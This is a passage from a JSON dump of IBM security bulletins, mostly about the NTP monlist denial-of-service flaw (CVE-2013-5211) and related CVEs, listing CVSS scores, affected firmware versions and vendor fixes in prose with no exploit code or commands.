Workaround(s) & Mitigation(s):\n\nNone Known \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n * [OpenSSL Project vulnerability website](<http://www.openssl.org/news/vulnerabilities.html>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n01 July 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: IBM Flex System Manager (FSM) is affected by vulnerability (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2019-01-31T01:25:01", "id": "604FCE50AACB68BB49851F3F38B3F43F31A200E4F5EBC74B2AAB98DFABBB21A9", "href": "https://www.ibm.com/support/pages/node/864974", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-23T21:53:06", "description": "## Summary\n\nA security vulnerability has been discovered in the Chassis Management Module NTP Server.\n\n## Vulnerability Details\n\n## Abstract\n\nA security vulnerability has been discovered in the Chassis Management Module NTP Server.\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**Description:** The monlist feature in ntp_request.c in ntpd in NTP before 4.2.7p26 allows remote attackers to cause a denial of service (traffic amplification) via forged (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests, as exploited in the wild in December 2013. 
\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/AU:N/C:N/I:N/A:P)\n\n \n\n\n## Affected products and versions\n\n**Affected Products**\n\n * Flex System Chassis Management Module, Option part number 68Y7029\n * Flex System Enterprise Chassis, Types 7893, 8721, 8724\n\n**Affected Versions**\n\n * 2PET10A-1.0.0,\n * 2PET10B-1.1.0,\n * 2PET10C-1.1.1\n * 2PET10D-1.1.1\n * 2PET10E-1.1.1\n * 2PET10F-1.1.1,\n * 2PET10G-1.20.0,\n * 2PET10H-1.20.1,\n * 2PET10I-1.20.2,\n * 2PET10K-1.40.0,\n * 2PET10M,P-1.40.1,\n * 2PET10Q-1.40.2\n * 2PET12D \u2013 1.50.0\n * 2PET12E-1.50.0,\n * 2PET12F \u2013 1.50.1\n * 2PET12G \u2013 1.50.1\n * 2PET12H \u2013 1.50.1\n * 2PET12I-1.50.1\n\n## Remediation:\n\nIBM recommends updating to Chassis Management Module 2.0.0K (2PET12K) or newer, available on IBM Fix Central. \n \n\n\n## Workaround(s) & Mitigation(s):\n\nNone \n\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n20 June 2014: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. 
Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Flash.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: The IBM Chassis Management Module (CMM) is affected by a vulnerability in NTP server (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2019-01-31T01:25:01", "id": "AD1DA6D174199D25AADB2923BD8D4E1064EF1D68BE7B50CC5E7EA02064BA9498", "href": "https://www.ibm.com/support/pages/node/864954", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-02-13T13:36:21", "description": "## Summary\n\nThe NTP daemon on the TS7700 has the 'monlist' command enabled. 
This command returns a list of recent hosts that have connected to the service.\n\n## Vulnerability Details\n\n \n**CVEID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n \n**DESCRIPTION:** \nNTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a specially-crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash. \n \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\nAll versions of microcode for the IBM Virtualization Engine TS7700 (3957-V06, 3957-V07, 3957-VEA, 3957-VEB) prior to release R2.1 are affected. In addition, microcode versions of releases R2.1, R3.0, R3.1 and R3.2 prior to and including the following are also affected: \n\n**Release**| **Version** \n---|--- \nR3.2| 8.32.0.84 \nR3.1| 8.31.1.4 \nR3.0| 8.30.2.23 \nR2.1| 8.21.0.178 \n \n## Remediation/Fixes\n\nContact IBM Service at 1-800-IBM-SERV to arrange an upgrade to the latest microcode level followed by the installation of vtd_exec.209. 
\n\n**Release**| **Fix** \n---|--- \nR3.2| 8.32.0.84 + vtd_exec.209 \nR3.1| 8.31.0.92 + vtd_exec.209 \nR3.0| 8.30.2.23 + vtd_exec.209 \nR2.1| 8.21.0.178 + vtd_exec.209 \nOlder Releases| 8.21.0.178 + vtd_exec.209 \n \n## Workarounds and Mitigations\n\nAlthough IBM recommends that you upgrade to the fixes identified above, you can mitigate, but not eliminate the risk of these vulnerabilities by restricting physical and network access to the TS7700 to authorized users and IBM Service Personnel only.\n\n## ", "cvss3": {}, "published": "2018-06-18T00:09:06", "type": "ibm", "title": "Security Bulletin: IBM Virtualization Engine TS7700 - The NTP monlist command is enabled (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211"], "modified": "2018-06-18T00:09:06", "id": "D93C9FB71BEABE16C18D831AAD49FD241CB228F6D7F68BB8ABFAAAD8C49505D2", "href": "https://www.ibm.com/support/pages/node/690201", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-09-12T13:52:50", "description": "## Summary\n\nAn interface on the IBM BladeCenter Advanced Management Module (AMM) may expose user account names and passwords that have been configured on that AMM.\n\n## Vulnerability Details\n\n## Abstract\n\nSecurity vulnerability has been discovered in NTP.\n\n## Content\n\n**Vulnerability Details:**\n\nCVE ID: 
[_CVE-2013-5211_](<https://vulners.com/cve/CVE-2013-5211>)\n\n**Description:** Remote attacker can use a valid NTP server to cause a potential denial of service attack by forging (1) REQ_MON_GETLIST or (2) REQ_MON_GETLIST_1 requests to the server, causing the server to send a relatively large unsolicited amount of data to the IP address spoofed in the forged request.\n\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## **Affected products and versions**\n\nThese IBM BladeCenter Advanced Management Module Firmware versions are affected:\n\n * v3.66D (BPET66D, BBET66D, BPEO66D)\n\nThis applies to the following hardware products:\n\n * BladeCenter Advanced Management Module, Option 25R5778\n * BladeCenter T Advanced Management Module, Option 32R0835\n * IBM BladeCenter(TM)-E: Type 1881, 7967, 8677\n * IBM BladeCenter(TM)-H: Types 1886, 7989, 8852\n * IBM BladeCenter(TM)-HT: Types 8740, 8750\n * IBM BladeCenter(TM)-S: Types 1948, 7779, 8886\n * IBM BladeCenter(TM)-T: Types 8720, 8730\n\n## Remediation:\n\n**Vendor Fix:**\n\nIBM recommends applying Advanced Management Module firmware version v3.66E (BBET66E) for BladeCenter T Chassis, v3.66E (BEO66E) for BladeCenter OEM Chassis and v3.66E (BPET66E) for all 
other IBM BladeCenter Chassis.\n\n## Workaround(s) & Mitigation(s):\n\nNone known \n \n \nReferences:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement** \nNone\n\n**Change History** \n24 June 2014: Original Copy Published\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2023-04-14T14:32:25", "type": "ibm", "title": "Security Bulletin: IBM BladeCenter Advanced Management Module Account Information Exposure (CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 6.4, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-6718"], "modified": "2023-04-14T14:32:25", "id": "1D5C9CF58B33AB7C86BF869E4AF3D2F7DE00446BE55E0024E770C2BB0C480912", "href": "https://www.ibm.com/support/pages/node/865100", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}, {"lastseen": "2023-02-23T21:44:03", "description": "## Summary\n\nAT&T has released versions 1801-zb for the Vyatta 5600. \n \nDetails of these releases can be found at https://cloud.ibm.com/docs/infrastructure/virtual-router-appliance?topic=virtual-router-appliance-at-t-vyatta-5600-vrouter-software-patches#at-t-vyatta-5600-vrouter-software-patches\n\n## Vulnerability Details\n\n#### Relevant CVE Information:\n\n**CVEID:** [CVE-2013-5211](<https://vulners.com/cve/CVE-2013-5211>) \n**DESCRIPTION:** NTP is vulnerable to a denial of service, caused by an error in the monlist feature in ntp_request.c. By sending a specially-crafted REQ_MON_GETLIST or REQ_MON_GETLIST_1 request, an attacker could exploit this vulnerability to consume available CPU resources and cause the server to crash. 
\nCVSS Base Score: 5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/90143> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID:** [CVE-2019-13272](<https://vulners.com/cve/CVE-2019-13272>) \n**DESCRIPTION:** Linux Kernel could allow a local attacker to gain elevated privileges on the system, caused by improper permission validation and improper object lifetime handling for PTRACE_TRACEME in the ptrace_link function. By sending a specially-crafted request, an attacker could exploit this vulnerability to gain root privileges on the system. \nCVSS Base Score: 7.4 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/163733> for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\n## Affected Products and Versions\n\nVRA - Vyatta 5600\n\n## Remediation/Fixes\n\nPlease contact IBM Cloud Support to request that the ISO for the 1801-za be pushed to your Vyatta system. 
Users will need to apply the upgraded code according to their defined processes (for example during a defined maintenance window).\n\n## ", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2019-09-11T17:35:09", "type": "ibm", "title": "Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2019-13272"], "modified": "2019-09-11T17:35:09", "id": "24400C9D70BA9E11A467C03D5072550ABC0427709E1B129CDE6B8C00AC26633B", "href": "https://www.ibm.com/support/pages/node/1073548", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-06-24T06:08:35", "description": "## Summary\n\nSecurity vulnerabilities have been discovered in the libxml2 component of IBM Security Network Intrusion Prevention System.\n\n## Vulnerability Details\n\n**CVEID: **[_CVE-2014-0191 _](<https://vulners.com/cve/CVE-2014-0191>)\n\n**DESCRIPTION: **\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion of internal entities within the xmlParserHandlePEReference() function. 
A remote attacker could exploit this vulnerability using a specially-crafted XML document containing malicious attributes to consume all available CPU resources.\n\nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/93092_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/93092>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n**CVEID: **[_CVE-2013-2877 _](<https://vulners.com/cve/CVE-2013-2877>)\n\n**DESCRIPTION: **\n\nGoogle Chrome is vulnerable to a denial of service, caused by an out-of-bounds read in XML parsing. By persuading a victim to visit a specially-crafted Web site, a remote attacker could exploit this vulnerability to cause a denial of service. \n \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/85531_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/85531>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:N/A:P)\n\n**CVEID: **[_CVE-2014-3660 _](<https://vulners.com/cve/CVE-2013-3660>)\n\n**DESCRIPTION:**\n\nLibxml2 is vulnerable to a denial of service, caused by the expansion of recursive entities. A remote attacker could exploit this vulnerability using a specially-crafted XML document processed by an application using libxml2 to consume all available CPU resources. 
\n \nCVSS Base Score: 5.0 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/97656_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/97656>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:N/I:N/A:P)\n\n## Affected Products and Versions\n\nProducts: GX3002, GX4002, GX4004, GX4004-v2, GX5008, GX5008-v2, GX5108, GX5108-v2, GX5208, GX5208-v2, GX6116, GX7412, GX7412-10, GX7412-05, GX7800, GV200, GV1000 \n\nFirmware versions: 4.6.2, 4.6.1, 4.6, 4.5, 4.4, and 4.3\n\n## Remediation/Fixes\n\n_The following IBM Threat Fixpacks have the fixes for these vulnerabilities. You can download them from the following links:_\n\n_Product_| _VRMF_| _Remediation/First Fix_ \n---|---|--- \n_IBM Security Network Intrusion Prevention System_| _4.6.2.0_| [4.6.2.0-ISS-ProvG-AllModels-System-FP0004](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.6.1.0_| [__4.6.1.0-ISS-ProvG-AllModels-System-FP0008__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.6.0.0_| [4.6.0.0-ISS-ProvG-AllModels-System-FP0006](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.5.0.0_| [_4.5.0.0-ISS-ProvG-AllModels-System-FP0008_](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion 
Prevention System_| _4.4.0.0_| [4.4.0.0-ISS-ProvG-AllModels-System-FP0008](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security%2BSystems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n_IBM Security Network Intrusion Prevention System_| _4.3.0.0_| [__4.3.0.0-ISS-ProvG-AllModels-System-FP0006__](<http://www-933.ibm.com/support/fixcentral/swg/selectFixes?parent=Security+Systems&product=ibm/Tivoli/Proventia+Network+Intrusion+Prevention+System&release=All&platform=All&function=all>) \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2022-02-23T19:48:26", "type": "ibm", "title": "Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 6.9, "vectorString": "AV:L/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-2877", "CVE-2013-3660", "CVE-2013-5211", "CVE-2014-0191", "CVE-2014-3660"], "modified": "2022-02-23T19:48:26", "id": "62699243F13608A014B52BC4C1F8BC188D617A0752C1A98F1E8CDB722F068C0E", "href": "https://www.ibm.com/support/pages/node/522823", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:53:07", "description": "## Summary\n\nThree potential vulnerabilities have been discovered in IBM GCM16/GCM32 Global Console Manager KVM Switches\n\n## Vulnerability Details\n\n## Abstract\n\nThree potential vulnerabilities have been discovered in IBM GCM16/GCM32 Global Console Manager KVM 
Switches\n\n## Content\n\n**Vulnerability Details:**\n\nCVE ID: [ ](<CVEID:%20CVE-2013-6718%20DESCRIPTION:%20An%20interface%20on%20the%20IBM%20BladeCenter%20Advanced%20Management%20Module%20\\(AMM\\)%20potentially%20exposes%20user%20account%20names%20and%20passwords%20that%20have%20been%20configured%20on%20that%20AMM.%20All%20configurations%20of%20the%20affected%20versions%20listed%20below%20contain%20the%20potential%20exposure.%20CVSS%20Base%20Score:%204.3%20CVSS%20Temporal%20Score:%20See%20http://xforce.iss.net/xforce/xfdb/89174%20for%20the%20current%20score%20CVSS%20Environmental%20Score*:%20Undefined%20CVSS%20Vector:%20\\(AV:N/AC:M/Au:N/C:P/I:N/A:N\\)>)[](<https://vulners.com/cve/CVE-2013-5211>)[__CVE-2014-3085__](<https://vulners.com/cve/CVE-2014-3085>)\n\n**Description:** Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. \nCVSS Base Score: 7.1 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/94091>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:H/Au:S/C:C/I:C/A:C)\n\n**CVEID:** [__ CVE-2014-3081__](<https://vulners.com/cve/CVE-2014-3081>)\n\n**Description:** IBM GCM16 and GCM32 contain a vulnerability that would allow a remote authenticated attacker to read any file on the system. \nCVSS Base Score: 6.3 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/93930>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:S/C:C/I:N/A:N)\n\n \n**CVEID:** [__ CVE-2014-3080__](<https://vulners.com/cve/CVE-2014-3080>)\n\n**Description:** GCM16 and GCM32 is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. 
An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See _<http://xforce.iss.net/xforce/xfdb/93929>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:M/Au:N/C:N/I:P/A:N)\n\n## **Affected products and versions**\n\n * IBM Global 2x2x16 Console Manager (GCM16)\n * IBM Global 4x2x32 Console Manager (GCM32)\n * Firmware versions 1.20.0.22575 and earlier\n\n## Remediation:\n\nIBM recommends updating to firmware version 1.20.20.23447 or newer, available on IBM Fix Central.\n\n## Workaround(s) & Mitigation(s):\n\nNone known\n\n## References:\n\n * [Complete CVSS Guide](<http://www.first.org/cvss/cvss-guide.html>)\n * [On-line Calculator V2](<http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2>)\n\n**Related Information:** \n[IBM Secure Engineering Web Portal](<http://www-01.ibm.com/software/test/wenses/security/>) \n[IBM Product Security Incident Response Blog](<https://www.ibm.com/blogs/PSIRT>) \n\n\n**Acknowledgement**\n\nThese vulnerabilities were reported to IBM by Alejandro Alvarez Bravo.\n\n**Change History** \n14 July 2014: Original Copy Published \n\n\n* The CVSS Environment Score is customer environment specific and will ultimately impact the Overall CVSS Score. Customers can evaluate the impact of this vulnerability in their environments by accessing the links in the Reference section of this Security Bulletin.\n\nNote: According to the Forum of Incident Response and Security Teams (FIRST), the Common Vulnerability Scoring System (CVSS) is an \"industry open standard designed to convey vulnerability severity and help to determine urgency and priority of response.\" IBM PROVIDES THE CVSS SCORES \"AS IS\" WITHOUT WARRANTY OF ANY KIND, INCLUDING THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. 
CUSTOMERS ARE RESPONSIBLE FOR ASSESSING THE IMPACT OF ANY ACTUAL OR POTENTIAL SECURITY VULNERABILITY.\n\n## ", "cvss3": {}, "published": "2019-01-31T01:25:01", "type": "ibm", "title": "Security Bulletin: Three potential vulnerabilities in IBM GCM16/GCM32 Global Console Managers (CVE-2014-3085, CVE-2014-3081, CVE-2014-3080)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.1, "vectorString": "AV:N/AC:H/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-5211", "CVE-2013-6718", "CVE-2014-3080", "CVE-2014-3081", "CVE-2014-3085"], "modified": "2019-01-31T01:25:01", "id": "368FC228DF101BC0EA89FB38D14DD38F0BD495576A532938022C431464F0DFB1", "href": "https://www.ibm.com/support/pages/node/865102", "cvss": {"score": 7.1, "vector": "AV:N/AC:H/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2023-02-23T21:53:09", "description": "## Summary\n\nIBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)\n\n## Vulnerability Details\n\n## Abstract\n\nIBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)\n\n## Content\n\n**Vulnerability Details:**\n\n**CVE-ID:** [CVE-2013-5772](<https://vulners.com/cve/CVE-2013-5772>) \n**Description:** Unspecified vulnerability in the Java SE component in allows remote attackers to affect integrity via unknown vectors related to jhat. 
\nCVSS Base Score: 2.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88007> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/N:I/P:A/N)\n\n**CVE-ID:** [CVE-2013-5803](<https://vulners.com/cve/CVE-2013-5803>) \n**Description:** Unspecified vulnerability in Java allows remote attackers to affect availability via vectors related to JGSS. \nCVSS Base Score: 2.6 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88008> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/H:Au/N:C/N:I/N:A/P)\n\n**CVE-ID:** [CVE-2013-5372](<https://vulners.com/cve/CVE-2013-5372>) \n**Description:** The XML4J parser allows remote attackers to cause a denial of service via a crafted XML document that triggers expansion for many entities. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/86662> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/M:Au/N:C/N:I/N:A/P)\n\n**CVE-ID:** [CVE-2013-5780](<https://vulners.com/cve/CVE-2013-5780>) \n**Description:** Unspecified vulnerability in Java allows remote attackers to affect confidentiality via unknown vectors related to Libraries. \nCVSS Base Score: 4.3 \nCVSS Temporal Score: See <http://xforce.iss.net/xforce/xfdb/88001> \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV/N:AC/M:Au/N:C/P:I/N:A/N)\n\n**CVE-ID:** [CVE-2014-0411](<https://vulners.com/cve/CVE-2014-0411>) \n**Description:** Unspecified vulnerability in Java allows remote attackers to affect confidentiality and integrity via vectors related to JSSE. 
